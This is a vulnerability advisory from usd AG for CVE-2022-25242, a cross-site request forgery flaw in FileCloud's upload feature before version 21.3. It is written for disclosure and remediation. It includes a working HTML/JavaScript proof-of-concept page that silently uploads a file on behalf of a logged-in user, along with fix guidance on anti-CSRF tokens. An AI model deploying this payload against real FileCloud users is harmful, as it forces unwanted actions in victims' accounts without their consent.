usd-2021-0029 (CVE-2022-25242) | FileCloud

Advisory ID: usd-2021-0029
CVE ID: CVE-2022-25242
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25242
Affected Product: FileCloud
Affected Versions: < 21.3
Vulnerability Type: CWE-352: Cross-Site Request Forgery (CSRF)
Security Risk: Medium
Vendor URL: https://www.filecloud.com/ 
Vendor Status: Fixed

Description

FileCloud's CSV file upload functionality prior v21.3 is vulnerable to Cross-Site Request Forgery (CSRF).

A Cross-Site Request Forgery (CSRF) attack leads to the execution of unwanted actions in a web application on behalf of a user, who is already logged into the application. When uploading files, the application does not validate an anti-CSRF token. Thus, the request for this functionality can be used for CSRF attacks to force an authenticated user to upload files into their storage. 

Proof of Concept (PoC)

The following screenshot shows the application in its initial state. No files were uploaded by the user at this point.

An attacker can construct a web page containing a button with the following HTML code. When this button is clicked by a user with a valid session in FileCloud, a request is executed on behalf of this user and a test file is uploaded without them noticing.

<html>
<!-- CSRF PoC -->
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/localhost\/upload?appname=explorer&filesize=19&path=%2Ftest&uploadpath=&offset=0&date=2021-10-14T14:39:13.000Z&filename=file.txt&complete=1", true);
xhr.setRequestHeader("Accept", "application\/json, text\/plain, *\/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------28669891251189313403517665446");
xhr.withCredentials = true;
var body = "-----------------------------28669891251189313403517665446\r\n" +
"Content-Disposition: form-data; name=\"filedata\"; filename=\"file.txt\"\r\n" +
"Content-Type: text/plain\r\n" +
"\r\n" +
"File was uploaded!\n" +
"\r\n" +
"-----------------------------28669891251189313403517665446--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

The web page generated by the attacker can be displayed in an arbitrary style. The following screenshot shows what this page would look like:

When a user clicks on the button, a fileupload to FileCloud is performed. The following request will be sent to the server. It is noticeable that there is no anti-CSRF token in the header.

The file has been successfully uploaded to the user's share, as displayed in the screenshot below:

Fix

It is recommended to secure every user action using an anti-CSRF token. Such a token consists of a pseudorandom value which is transmitted with every user request using a hidden field. Upon arrival of a new user request the server validates the anti-CSRF token. The user request is then processed only in case of a successful token validation. Such a token has to be generated at least once for every user session.

References

Timeline

Credits

This security vulnerability was found by Gerbert Roitburd and Tim Wörner of usd AG.